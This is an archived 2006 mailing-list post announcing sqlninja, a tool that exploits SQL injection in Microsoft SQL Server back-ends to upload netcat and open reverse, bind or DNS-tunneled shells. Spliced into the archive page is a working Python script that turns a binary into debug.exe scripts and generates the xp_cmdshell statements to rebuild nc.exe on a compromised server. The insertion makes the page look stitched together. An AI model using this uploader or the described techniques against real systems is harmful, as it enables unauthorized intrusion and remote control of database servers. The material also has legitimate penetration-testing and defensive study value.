From: A.R. (r00t@northernfortress.net)
Date: Fri Jun 23 2006 - 19:33:29 EDT
Hello fellow pen-testers,
a first version of sqlninja has been released at the address
http://sqlninja.sourceforge.net
sqlninja is a little toy that was coded during a couple of
pen-tests we did lately, and it is aimed at exploiting SQL Injection
vulnerabilities in web applications that use Microsoft SQL Server as
their back-end.
It borrows some ideas from similar tools like bobcat, but it is more
targeted at providing a remote shell even with paranoid firewall
settings.
It is written in perl and runs on UNIX-like boxes.
Here's a list of what it does so far:
- Upload of nc.exe (or any other executable) using the good ol' debug
script trick
- TCP/UDP portscan from the target SQL Server to the attacking machine,
in order to find a port that is allowed by the firewall of the target
network and use it for a reverse shell
- Direct and reverse bindshell, both TCP and UDP
- DNS-tunneled pseudoshell, when no TCP/UDP ports are available for a
direct/reverse shell, but the DB server can resolve external hostnames
Since it is an alpha version and was originally supposed to be just a
quick&dirty toy for a pentest, there are lots of bugs waiting to be
found and fixed, so go ahead and download it! :)
More tunneling options (e.g. HTTP, SMTP, ...) will be added in the
future, together with tunnel encryption, but I hope you will find the
tool helpful already.
Enjoy!
-- icesurfer
--
Show me a man who lives alone and has a perpetually clean kitchen, and 8
times out of 9 I'll show you a man with detestable spiritual qualities.
-- Charles Bukowski
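The "debug script trick" mentioned in the feature list is the classic way of getting a binary onto a Windows host when the only primitive is command execution: the file is turned into a script for debug.exe (the `n`/`e`/`rcx`/`w` commands), the script lines are echoed into a file one by one, and debug is run on it. The following is an added illustration of that conversion and of the xp_cmdshell statements that would carry it; it is not sqlninja's own code. The file names (`nc`, `nc.exe`), the working directory `C:\Windows\Temp` and the assumption that xp_cmdshell is reachable through the injection are all assumptions of this example.

```python
# Added illustration (not sqlninja's own code) of the "debug script trick":
# a binary is rebuilt on the SQL Server host by echoing a debug.exe script
# through xp_cmdshell and then running debug on it.
# File names, the working directory and the target name are assumptions.

DEBUG_LOAD_OFFSET = 0x100                   # debug.exe puts data at CS:0100 by default
MAX_CHUNK = 0x10000 - DEBUG_LOAD_OFFSET     # 0xFF00 bytes fit below the 64 KB segment end


def to_debug_scripts(data: bytes, basename: str, chunk_size: int = MAX_CHUNK) -> list:
    """One debug.exe script per chunk; script n writes the file <basename>.<n>."""
    if not 0 < chunk_size <= MAX_CHUNK:
        raise ValueError("chunk_size must be between 1 and 0xFF00")
    scripts = []
    for n, start in enumerate(range(0, len(data), chunk_size)):
        chunk = data[start:start + chunk_size]
        lines = [f"n {basename}.{n}"]                 # 'n' names the output file
        for off in range(0, len(chunk), 16):         # 'e addr b b ...' enters bytes at addr
            hexbytes = " ".join(f"{b:02x}" for b in chunk[off:off + 16])
            lines.append(f"e {DEBUG_LOAD_OFFSET + off:04x} {hexbytes}")
        # 'rcx' prompts for a new CX value (the byte count 'w' writes), then write and quit
        lines += ["rcx", f"{len(chunk):x}", "w", "q"]
        scripts.append("\n".join(lines) + "\n")
    return scripts


def simulate_debug(script: str) -> bytes:
    """Replay the few debug.exe commands the scripts use, to check the round trip offline."""
    mem = bytearray(0x10000)
    lines = script.splitlines()
    cx = 0
    i = 0
    while i < len(lines):
        cmd = lines[i].split()
        if cmd[0] == "e":
            addr = int(cmd[1], 16)
            for k, h in enumerate(cmd[2:]):
                mem[addr + k] = int(h, 16)
        elif cmd[0] == "rcx":
            i += 1
            cx = int(lines[i], 16)
        elif cmd[0] == "w":
            return bytes(mem[DEBUG_LOAD_OFFSET:DEBUG_LOAD_OFFSET + cx])
        i += 1
    raise ValueError("script never issued 'w'")


def to_xp_cmdshell(scripts, basename, target, workdir=r"C:\Windows\Temp"):
    """T-SQL statements that recreate each script on the server, run debug on it
    and join the parts with 'copy /b'. The redirection is written before 'echo'
    because a line ending in a digit right before '>>' (e.g. 'echo 1>>file')
    would be parsed by cmd.exe as a handle redirection instead of text."""
    stmts, parts = [], []
    for n, script in enumerate(scripts):
        scr = f"{workdir}\\{basename}.{n}.scr"
        for line in script.splitlines():
            stmts.append(f"EXEC master..xp_cmdshell '>>{scr} echo {line}'")
        stmts.append(f"EXEC master..xp_cmdshell 'cd /d {workdir} && debug < {scr}'")
        parts.append(f"{basename}.{n}")
    stmts.append(f"EXEC master..xp_cmdshell 'cd /d {workdir} && copy /b {'+'.join(parts)} {target}'")
    return stmts


if __name__ == "__main__":
    # Constructed stand-in for nc.exe, not a real binary
    fake_binary = bytes(range(256)) * 3 + b"\x01\x02"
    scripts = to_debug_scripts(fake_binary, "nc", chunk_size=512)
    assert b"".join(simulate_debug(s) for s in scripts) == fake_binary
    for stmt in to_xp_cmdshell(scripts, "nc", "nc.exe")[:3]:
        print(stmt)
```

Each chunk is capped at 0xFF00 bytes because debug works inside a single 64 KB segment with the data starting at offset 0x100, which is why a real nc.exe ends up as several parts joined with `copy /b`. Every script line becomes one xp_cmdshell call, so the upload costs one injected query per 16 bytes of payload; that is the price of the trick and the reason the tool keeps the lines short.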
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:10 EDT